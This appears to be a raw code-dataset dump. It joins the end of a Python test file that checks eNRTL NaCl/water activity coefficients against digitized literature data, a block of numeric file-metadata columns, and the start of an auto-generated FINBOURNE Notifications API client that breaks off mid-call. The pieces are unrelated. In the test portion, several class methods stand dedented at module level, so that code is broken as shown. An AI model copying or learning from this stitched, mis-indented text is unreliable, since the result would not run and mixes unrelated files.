            0.11669575368525856: 1.4616847357003733,
            0.13678697619671068: 1.4551116844559127,
            0.1568759869386763: 1.4473000422989863,
            0.17697310750209252: 1.4440299001544339,
            0.19706727903952678: 1.4391083034599275,
            0.21714891721653726: 1.4271680249281156,
            0.2372312926500432: 1.415640610033792,
            0.2573195661355132: 1.4074161042393771,
            0.27739235723457745: 1.3905214620577024,
            0.29747473266808344: 1.378994047163379,
            0.3175489982801387: 1.3629251322566815,
            0.3376203148662119: 1.3452047628000297,
            0.3576997412737358: 1.332025893355752,
            0.3777658970643405: 1.3114154784366803,
            0.3978268920594765: 1.2879150180551888,
            0.41788714979811703: 1.2640016940362084,
            0.43794077222829786: 1.2363725972798314,
            0.4579907083760012: 1.2066791823360115,
            0.47803400921524486: 1.1732699946547944,
            0.49807952182397497: 1.1410993978860429,
            0.5181139755852725: 1.102735846554963,
            0.5381454803205878: 1.0627208406739292,
            0.5581718242604347: 1.0198157893304751,
            0.5781907956353264: 0.9727821016121361,
            0.5982009199322718: 0.9207940502439338,
            0.618197773612298: 0.8613744534009378,
            0.6381975763183062: 0.8036063111078957,
            0.6581877946898728: 0.7404709415275024,
            0.6781794875744304: 0.678161299222086,
            0.6981645451505283: 0.6121358841792732,
            0.718139281135689: 0.5403303782116202,
            0.7381140171208497: 0.46852487224396766,
            0.7580821177975509: 0.39300359353891734,
            0.7780472694482699: 0.3158308602839135,
            0.7980079975600158: 0.2361809452039778,
            0.8209839409036424: 0.13934585427154245,
            0.8379095478581289: 0.06573379683191538,
            0.8569581176584067: -0.013013060958402267,
            0.8772461460653336: -0.10618700754926813,
            0.8913177190714701: -0.15982445783107968,
            0.9086308771904323: -0.24383529059164832,
            0.928588656276196: -0.3251366602215384,
            0.9486120511900609: -0.3696931661149465,
            0.9686917233497501: -0.3827344143467273,
            0.9855967963455463: -0.3541317749389892,
            # Error gets too large at this point
            # 0.9946128753251389: -0.19481723605693535
            }
    # Need to correct for different reference state
    OFFSET = 1.462
    for x, g in data.items():
        # Equimolar Na+/Cl- making up the balance of the mixture
        model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
        model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
            (1-x)/2)
        model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
            (1-x)/2)
        assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
            model.state[1].Liq_log_gamma["Na+"])
        assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
            model.state[1].Liq_log_gamma["Cl-"])
        # Apparent (molecular) NaCl activity coefficient should match too
        assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
            model.state[1].Liq_log_gamma_appr["NaCl"])
@pytest.mark.unit
def test_pure_water(self, model):
    """Spot-check intermediate eNRTL expressions at the pure-water limit.

    Verifies the effective mole fractions (X), charge fractions (Y),
    non-randomness factors (alpha), G and tau binary parameters, and that
    both activity-coefficient contributions for water vanish.
    """
    # Start by setting all mole fractions to small number
    # Using 0 results in division by zero errors
    for k in model.state[1].mole_frac_phase_comp:
        model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
    # Test pure water
    model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1)
    # Check mixing expressions
    assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(1, rel=1e-8)
    assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
        1e-12, rel=1e-8)
    assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
        1e-12, rel=1e-8)
    for v in model.state[1].Liq_Y.values():
        assert value(v) == pytest.approx(1, rel=1e-8)
    # alpha: molecular-molecular pairs use 0.3, all others 0.2
    for k, v in model.state[1].Liq_alpha.items():
        if k == ("H2O", "H2O"):
            assert value(v) == 0.3
        else:
            assert value(v) == 0.2
    # G = exp(-alpha*tau) for each binary interaction
    assert value(model.state[1].Liq_G["H2O", "H2O"]) == 1
    assert value(model.state[1].Liq_G["H2O", "Na+"]) == exp(-0.2*8.885)
    assert value(model.state[1].Liq_G["Na+", "H2O"]) == exp(-0.2*-4.549)
    assert value(model.state[1].Liq_G["H2O", "Cl-"]) == exp(-0.2*8.885)
    assert value(model.state[1].Liq_G["Cl-", "H2O"]) == exp(-0.2*-4.549)
    assert value(model.state[1].Liq_G["Na+", "Cl-"]) == 1
    assert value(model.state[1].Liq_G["Cl-", "Na+"]) == 1
    assert value(model.state[1].Liq_tau["H2O", "H2O"]) == 0
    assert value(model.state[1].Liq_tau["H2O", "Na+"]) == pytest.approx(
        8.885, rel=1e-8)
    assert value(model.state[1].Liq_tau["Na+", "H2O"]) == pytest.approx(
        -4.549, rel=1e-8)
    assert value(model.state[1].Liq_tau["H2O", "Cl-"]) == pytest.approx(
        8.885, rel=1e-8)
    assert value(model.state[1].Liq_tau["Cl-", "H2O"]) == pytest.approx(
        -4.549, rel=1e-8)
    assert value(model.state[1].Liq_tau["Na+", "Cl-"]) == 0
    assert value(model.state[1].Liq_tau["Cl-", "Na+"]) == 0
    # Check activity coefficient contributions
    assert (value(model.state[1].Liq_log_gamma_pdh["H2O"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc["H2O"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_pdh["H2O"] +
                  model.state[1].Liq_log_gamma_lc["H2O"]) ==
            pytest.approx(0, abs=1e-10))
@pytest.mark.unit
def test_pure_NaCl(self, model):
    """Spot-check intermediate eNRTL expressions at the pure-salt limit.

    With only Na+ and Cl- present (trace water), all ion activity
    coefficient contributions should be zero in this reference state, and
    the actual X values should match the reference-state X values.
    """
    # Test pure NaCl
    model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1e-12)
    model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(0.5)
    model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(0.5)
    # Check mixing expressions
    assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(
        1e-12, rel=1e-8)
    assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
        0.5, rel=1e-8)
    assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
        0.5, rel=1e-8)
    # At the pure-salt limit, actual state == reference state
    assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(
        value(model.state[1].Liq_X_ref["H2O"]), rel=1e-8)
    assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
        value(model.state[1].Liq_X_ref["Na+"]), rel=1e-8)
    assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
        value(model.state[1].Liq_X_ref["Cl-"]), rel=1e-8)
    for v in model.state[1].Liq_Y.values():
        assert value(v) == pytest.approx(1, rel=1e-8)
    # alpha: molecular-molecular pairs use 0.3, all others 0.2
    for k, v in model.state[1].Liq_alpha.items():
        if k == ("H2O", "H2O"):
            assert value(v) == 0.3
        else:
            assert value(v) == 0.2
    # G = exp(-alpha*tau) for each binary interaction
    assert value(model.state[1].Liq_G["H2O", "H2O"]) == 1
    assert value(model.state[1].Liq_G["H2O", "Na+"]) == exp(-0.2*8.885)
    assert value(model.state[1].Liq_G["Na+", "H2O"]) == exp(-0.2*-4.549)
    assert value(model.state[1].Liq_G["H2O", "Cl-"]) == exp(-0.2*8.885)
    assert value(model.state[1].Liq_G["Cl-", "H2O"]) == exp(-0.2*-4.549)
    assert value(model.state[1].Liq_G["Na+", "Cl-"]) == 1
    assert value(model.state[1].Liq_G["Cl-", "Na+"]) == 1
    assert value(model.state[1].Liq_tau["H2O", "H2O"]) == 0
    assert value(model.state[1].Liq_tau["H2O", "Na+"]) == pytest.approx(
        8.885, rel=1e-8)
    assert value(model.state[1].Liq_tau["Na+", "H2O"]) == pytest.approx(
        -4.549, rel=1e-8)
    assert value(model.state[1].Liq_tau["H2O", "Cl-"]) == pytest.approx(
        8.885, rel=1e-8)
    assert value(model.state[1].Liq_tau["Cl-", "H2O"]) == pytest.approx(
        -4.549, rel=1e-8)
    assert value(model.state[1].Liq_tau["Na+", "Cl-"]) == 0
    assert value(model.state[1].Liq_tau["Cl-", "Na+"]) == 0
    # All Na+ activity coefficient contributions should vanish
    assert (value(model.state[1].Liq_log_gamma_pdh["Na+"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I["Na+"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I0["Na+"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I["Na+"]) ==
            pytest.approx(value(model.state[1].Liq_log_gamma_lc_I0["Na+"]),
                          abs=1e-12))
    assert (value(model.state[1].Liq_log_gamma_lc["Na+"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma["Na+"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_pdh["Na+"] +
                  model.state[1].Liq_log_gamma_lc["Na+"]) ==
            pytest.approx(
                value(model.state[1].Liq_log_gamma["Na+"]), abs=1e-10))
    assert pytest.approx(value(
        model.state[1].Liq_log_gamma["Na+"]), abs=1e-10) == log(
        value(model.state[1].act_coeff_phase_comp["Liq", "Na+"]))
    # All Cl- activity coefficient contributions should vanish
    assert (value(model.state[1].Liq_log_gamma_pdh["Cl-"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I["Cl-"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I0["Cl-"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_lc_I["Cl-"]) ==
            pytest.approx(value(model.state[1].Liq_log_gamma_lc_I0["Cl-"]),
                          abs=1e-12))
    assert (value(model.state[1].Liq_log_gamma_lc["Cl-"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma["Cl-"]) ==
            pytest.approx(0, abs=1e-10))
    assert (value(model.state[1].Liq_log_gamma_pdh["Cl-"] +
                  model.state[1].Liq_log_gamma_lc["Cl-"]) ==
            pytest.approx(
                value(model.state[1].Liq_log_gamma["Cl-"]), abs=1e-10))
    assert pytest.approx(value(
        model.state[1].Liq_log_gamma["Cl-"]), abs=1e-10) == log(
        value(model.state[1].act_coeff_phase_comp["Liq", "Cl-"]))
class TestStateBlockUnsymmetric(object):
    """Repeat the state-block validation using the unsymmetric reference
    state.

    The digitized data sets are the same as for the symmetric-reference
    tests, but no reference-state OFFSET corrections are needed here.
    """

    @pytest.fixture(scope="class")
    def model(self):
        """Build a state block configured with the unsymmetric reference
        state and a fixed temperature of 298.15 K."""
        config = dict(configuration)
        eos_opt = config["phases"]["Liq"]["equation_of_state_options"] = {}
        eos_opt["reference_state"] = Unsymmetric

        m = ConcreteModel()
        m.params = GenericParameterBlock(default=config)

        m.state = m.params.build_state_block([1])

        # Need to set a value of T for checking expressions later
        m.state[1].temperature.set_value(298.15)

        return m

    @pytest.mark.unit
    def test_parameters(self, model):
        """Confirm the binary tau parameters were loaded as configured."""
        assert model.params.Liq.tau["H2O", "Na+, Cl-"].value == 8.885
        assert model.params.Liq.tau["Na+, Cl-", "H2O"].value == -4.549

    @pytest.mark.unit
    def test_log_gamma_h2o(self, model):
        """Validate the water activity coefficient (exact and apparent
        forms) against data digitized from the literature."""
        # start with pure water
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)

        # Data digitized from Fig 6 [1]
        # Keys are x_H2O, values are the digitized log(gamma_H2O).
        data = {0.0166772823326004: -1.32412227463648,
                0.0368235348413794: -1.29987852737794,
                0.0569697873501583: -1.2756347801194,
                0.0771212007755797: -1.24850091954107,
                0.0972755632962254: -1.21971556563714,
                0.117432874912095: -1.18927871840762,
                0.137590186527965: -1.1588418711781,
                0.157748235417641: -1.12799215061718,
                0.177912182497766: -1.09383944340507,
                0.198075392304084: -1.06009960952436,
                0.218237127562791: -1.02718552230644,
                0.238402549190528: -0.992207068431534,
                0.255813423719564: -0.964639854693858,
                0.315405637317823: -0.854261500929733,
                0.335560737112275: -0.825063273694407,
                0.355727633287624: -0.789259073156702,
                0.375898215832003: -0.751390505962001,
                0.396062900185934: -0.716824925418492,
                0.416232008182701: -0.67978210488659,
                0.436393743441407: -0.646868017668675,
                0.45655990234295: -0.611476690462368,
                0.476725323970687: -0.576498236587459,
                0.496889271050811: -0.542345529375349,
                0.517057641773772: -0.505715582174845,
                0.537221588853897: -0.471562874962733,
                0.557387747755439: -0.436171547756426,
                0.57755243210937: -0.401605967212917,
                0.597715641915689: -0.367866133332205,
                0.617878114448201: -0.334539172782892,
                0.638036900611684: -0.303276578890572,
                0.658196424048972: -0.271601111666854,
                0.678351523843423: -0.242402884431529,
                0.698502199995039: -0.215681897184597,
                0.718656562515684: -0.186896543280671,
                0.7388072386673: -0.160175556033739,
                0.758950542080854: -0.137583302100794,
                0.779093845494409: -0.11499104816785,
                0.799235674360352: -0.0932245408977037,
                0.820938311873743: -0.0746252682763595,
                0.83951122208037: -0.0542331330027968,
                0.887081111079702: -0.0241043023855885,
                0.907200084457657: -0.0151368683888049,
                0.927323481478448: -0.00369219440362834,
                0.947432870296923: -0.0000921137150293738,
                0.967534886377337: -0.0006207663404183,
                0.982152912433448: -0.00191356230614259,
                0.999998: 0}

        for x, g in data.items():
            # Equimolar Na+/Cl- making up the balance of the mixture
            model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
            model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
                (1-x)/2)
            model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
                (1-x)/2)

            assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
                model.state[1].Liq_log_gamma["H2O"])
            assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
                model.state[1].Liq_log_gamma_appr["H2O"])

    @pytest.mark.unit
    def test_log_gamma_pdh(self, model):
        """Validate the long-range (PDH) contribution to the ion activity
        coefficients; no OFFSET needed in the unsymmetric reference."""
        # start with pure water
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)

        # Data digitized from Fig 6 [1]
        data = {0.0102202097143692: -0.934567107147103,
                0.030381425381713: -0.931468127697603,
                0.0505354137471605: -0.932910302939649,
                0.0706887450851628: -0.934765310426382,
                0.0908453615603908: -0.934556156689684,
                0.110996721816058: -0.937649660910475,
                0.131153995318731: -0.93702767492909,
                0.151309297739069: -0.937644185681764,
                0.171467228269187: -0.936609367455696,
                0.191622530689525: -0.937225878208369,
                0.211781775274533: -0.935365395492927,
                0.231939705804651: -0.934330577266858,
                0.252104863636666: -0.92875460434924,
                0.321728090914091: -0.933511483051937,
                0.34189390577355: -0.927522677889634,
                0.36205840657812: -0.922359537216703,
                0.382220936300354: -0.91843489327783,
                0.402379523857917: -0.916987242807075,
                0.422542053580151: -0.913062598868203,
                0.442695384918153: -0.914917606354935,
                0.462852001393382: -0.914708452618238,
                0.48301124597839: -0.912847969902795,
                0.503172461645734: -0.909748990453295,
                0.523331049203297: -0.908301339982539,
                0.543494892980421: -0.903551031554295,
                0.563651509455649: -0.903341877817597,
                0.583805497821097: -0.904784053059643,
                0.603966713488441: -0.901685073610144,
                0.624131871320455: -0.896109100692527,
                0.644295058070134: -0.891771624508968,
                0.664454302655143: -0.889911141793526,
                0.684614204267596: -0.887637826833398,
                0.704786589401507: -0.877520699224235,
                0.724946491013961: -0.875247384264106,
                0.74511099181853: -0.870084243591175,
                0.765274835595655: -0.865333935162931,
                0.785453133976572: -0.851501317351594,
                0.805626833165373: -0.840558525253058,
                0.827641523255411: -0.824211134895509,
                0.84781883609516: -0.8109977654512,
                0.868006989887754: -0.790972663969571,
                0.888198428817574: -0.768883401264512,
                0.90840235126885: -0.738950325910417,
                0.928616786159249: -0.702411934641345,
                0.948852902955337: -0.652250079297633,
                0.968231171867699: -0.565426968552611,
                0.981271802390295: -0.43102358298104,
                0.994543298706282: -0.295478442814278}

        for x, g in data.items():
            # Equimolar Na+/Cl- making up the balance of the mixture
            model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
            model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
                (1-x)/2)
            model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
                (1-x)/2)

            assert pytest.approx(g, rel=0.04, abs=0.07) == value(
                model.state[1].Liq_log_gamma_pdh["Na+"])
            assert pytest.approx(g, rel=0.04, abs=0.07) == value(
                model.state[1].Liq_log_gamma_pdh["Cl-"])

    @pytest.mark.unit
    def test_log_gamma_lc(self, model):
        """Validate the local-composition (lc) contribution to the ion
        activity coefficients; no OFFSET needed in the unsymmetric
        reference."""
        # start with pure water
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)

        # Data digitized from Fig 6 [1]
        data = {0.00642910940949107: 2.44391469691802,
                0.0261925045768978: 2.42178852215264,
                0.046347839144311: 2.42099343992118,
                0.0665026808921592: 2.41978548440975,
                0.086651608805228: 2.41362304953867,
                0.106801522357427: 2.40828636122754,
                0.126949464631366: 2.40129817979652,
                0.147097406905304: 2.39430999836549,
                0.167250277374893: 2.39145054973418,
                0.187395262731442: 2.38198512862334,
                0.207538276809731: 2.3708682143926,
                0.227685726264105: 2.36346715968161,
                0.24782331932718: 2.3478086393712,
                0.267966826225035: 2.33710459842044,
                0.288102940829415: 2.32020745827011,
                0.308242505170749: 2.30620043107958,
                0.328377141316434: 2.28806467108934,
                0.348510299003425: 2.26869029125919,
                0.36864394950998: 2.24972878470901,
                0.388771193362191: 2.2253999255192,
                0.408894987477447: 2.1981809533696,
                0.429018781592703: 2.17096198122,
                0.449137154692745: 2.13920140299072,
                0.469255527792787: 2.10744082476143,
                0.489368972697179: 2.07155151373244,
                0.509481924782006: 2.03524932942348,
                0.52958649893423: 1.99192829935501,
                0.549690580266888: 1.94819439600656,
                0.569786776486507: 1.89785452017858,
                0.589878537330041: 1.84379878483086,
                0.609963398699666: 1.78396282356355,
                0.630044810332336: 1.72123674933644,
                0.650120800949792: 1.65396906902965,
                0.670193834649858: 1.58422414904303,
                0.690261940154275: 1.5103504962567,
                0.710324624643477: 1.4319352373907,
                0.730382873756595: 1.34980411900495,
                0.750435701854498: 1.26313139453952,
                0.770486065854576: 1.17439430367423,
                0.790531501659005: 1.08152848000924,
                0.807210557418041: 1.01934951372455,
                0.832434963627757: 0.879209621277547,
                0.851556165620075: 0.779608815922458,
                0.869765897827013: 0.683966446828523,
                0.88797129322178: 0.584690792870842,
                0.906174520210461: 0.483598496481289,
                0.9243842524174: 0.387956127387353,
                0.943499737702764: 0.283565991984599,
                0.962618672725083: 0.182065969541643,
                0.98081688527469: 0.0767726875283845,
                0.99266736005891: 0.0264587394852946}

        for x, g in data.items():
            # Equimolar Na+/Cl- making up the balance of the mixture
            model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
            model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
                (1-x)/2)
            model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
                (1-x)/2)

            assert pytest.approx(g, rel=3e-2, abs=2e-2) == value(
                model.state[1].Liq_log_gamma_lc["Na+"])
            assert pytest.approx(g, rel=3e-2, abs=2e-2) == value(
                model.state[1].Liq_log_gamma_lc["Cl-"])

    @pytest.mark.unit
    def test_log_gamma(self, model):
        """Validate the total ion activity coefficients and the apparent
        NaCl value; no OFFSET needed in the unsymmetric reference."""
        # start with pure water
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)

        # Data digitized from Fig 6 [1]
        data = {0.01620941361168171: 1.4776225827856462,
                0.03630284789262042: 1.4722881224536513,
                0.05640439199500977: 1.4714951621340302,
                0.07650593609739911: 1.4707022018144094,
                0.09660453117380643: 1.468257786944834,
                0.11669575368525856: 1.4616847357003733,
                0.13678697619671068: 1.4551116844559127,
                0.1568759869386763: 1.4473000422989863,
                0.17697310750209252: 1.4440299001544339,
                0.19706727903952678: 1.4391083034599275,
                0.21714891721653726: 1.4271680249281156,
                0.2372312926500432: 1.415640610033792,
                0.2573195661355132: 1.4074161042393771,
                0.27739235723457745: 1.3905214620577024,
                0.29747473266808344: 1.378994047163379,
                0.3175489982801387: 1.3629251322566815,
                0.3376203148662119: 1.3452047628000297,
                0.3576997412737358: 1.332025893355752,
                0.3777658970643405: 1.3114154784366803,
                0.3978268920594765: 1.2879150180551888,
                0.41788714979811703: 1.2640016940362084,
                0.43794077222829786: 1.2363725972798314,
                0.4579907083760012: 1.2066791823360115,
                0.47803400921524486: 1.1732699946547944,
                0.49807952182397497: 1.1410993978860429,
                0.5181139755852725: 1.102735846554963,
                0.5381454803205878: 1.0627208406739292,
                0.5581718242604347: 1.0198157893304751,
                0.5781907956353264: 0.9727821016121361,
                0.5982009199322718: 0.9207940502439338,
                0.618197773612298: 0.8613744534009378,
                0.6381975763183062: 0.8036063111078957,
                0.6581877946898728: 0.7404709415275024,
                0.6781794875744304: 0.678161299222086,
                0.6981645451505283: 0.6121358841792732,
                0.718139281135689: 0.5403303782116202,
                0.7381140171208497: 0.46852487224396766,
                0.7580821177975509: 0.39300359353891734,
                0.7780472694482699: 0.3158308602839135,
                0.7980079975600158: 0.2361809452039778,
                0.8209839409036424: 0.13934585427154245,
                0.8379095478581289: 0.06573379683191538,
                0.8569581176584067: -0.013013060958402267,
                0.8772461460653336: -0.10618700754926813,
                0.8913177190714701: -0.15982445783107968,
                0.9086308771904323: -0.24383529059164832,
                0.928588656276196: -0.3251366602215384,
                0.9486120511900609: -0.3696931661149465,
                0.9686917233497501: -0.3827344143467273,
                0.9855967963455463: -0.3541317749389892,
                # Error gets too big at this point
                # 0.9946128753251389: -0.19481723605693535
                }

        for x, g in data.items():
            # Equimolar Na+/Cl- making up the balance of the mixture
            model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
            model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
                (1-x)/2)
            model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
                (1-x)/2)

            assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
                model.state[1].Liq_log_gamma["Na+"])
            assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
                model.state[1].Liq_log_gamma["Cl-"])
            # Apparent (molecular) NaCl activity coefficient should match
            assert pytest.approx(g, rel=3e-2, abs=6e-2) == value(
                model.state[1].Liq_log_gamma_appr["NaCl"])

    @pytest.mark.unit
    def test_pure_water(self, model):
        """At the pure-water limit, all log(gamma) terms should be zero in
        the unsymmetric reference state."""
        # Start by setting all mole fractions to small number
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)

        # Test pure water
        model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1)

        # Unsymmetric reference state - all ln(gammas) should be 0
        for v in model.state[1].Liq_log_gamma.values():
            assert value(v) == pytest.approx(0, abs=1e-5)
        for v in model.state[1].Liq_log_gamma_pdh.values():
            assert value(v) == pytest.approx(0, abs=1e-5)
        for v in model.state[1].Liq_log_gamma_lc.values():
            assert value(v) == pytest.approx(0, abs=1e-5)
| 47.619048
| 81
| 0.57831
| 4,510
| 42,000
| 5.283814
| 0.151663
| 0.036257
| 0.065548
| 0.053462
| 0.919723
| 0.916911
| 0.907176
| 0.902937
| 0.886446
| 0.882375
| 0
| 0.455339
| 0.299214
| 42,000
| 881
| 82
| 47.673099
| 0.354296
| 0.059143
| 0
| 0.859482
| 0
| 0
| 0.025375
| 0.002163
| 0
| 0
| 0
| 0
| 0.11869
| 1
| 0.023192
| false
| 0
| 0.012278
| 0.001364
| 0.043656
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
105290adcc046294e0a04cc5a6600ce1479b865f
| 46,489
|
py
|
Python
|
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
sdk/lusid_notifications/api/subscriptions_api.py
|
finbourne/notifications-sdk-python-preview
|
2368e05445c74dc248afc1c98efa9f2ca895de3b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
FINBOURNE Notifications API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.1.317
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid_notifications.api_client import ApiClient
from lusid_notifications.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SubscriptionsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Initialise the API wrapper.

    :param api_client: client used to issue HTTP requests; a default
        ApiClient is constructed when none is supplied.
    """
    self.api_client = ApiClient() if api_client is None else api_client
def create_subscription(self, create_subscription, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] CreateSubscription: Create a new subscription. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_subscription(create_subscription, async_req=True)
    >>> result = thread.get()

    :param create_subscription: The data to create a subscription (required)
    :type create_subscription: CreateSubscription
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: Subscription
    """
    # Delegate to the *_with_http_info variant, asking for the bare
    # deserialized body rather than the (data, status, headers) tuple.
    kwargs.update(_return_http_data_only=True)
    return self.create_subscription_with_http_info(
        create_subscription, **kwargs)  # noqa: E501
def create_subscription_with_http_info(self, create_subscription, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] CreateSubscription: Create a new subscription. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_subscription_with_http_info(create_subscription, async_req=True)
    >>> result = thread.get()

    :param create_subscription: The data to create a subscription (required)
    :type create_subscription: CreateSubscription
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(Subscription, status_code(int), headers(HTTPHeaderDict))
    """

    local_var_params = locals()

    # Positional parameter names; the framework kwargs are appended below.
    all_params = [
        'create_subscription'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject any keyword argument not in the whitelist above, then fold
    # the accepted ones into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_subscription" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'create_subscription' is set
    if self.api_client.client_side_validation and ('create_subscription' not in local_var_params or  # noqa: E501
                                                   local_var_params['create_subscription'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `create_subscription` when calling `create_subscription`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request body is the CreateSubscription object itself.
    body_params = None
    if 'create_subscription' in local_var_params:
        body_params = local_var_params['create_subscription']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # set the LUSID header
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.1.317'

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # Mapping of HTTP status code to the model used to deserialize it.
    response_types_map = {
        201: "Subscription",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/subscriptions', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
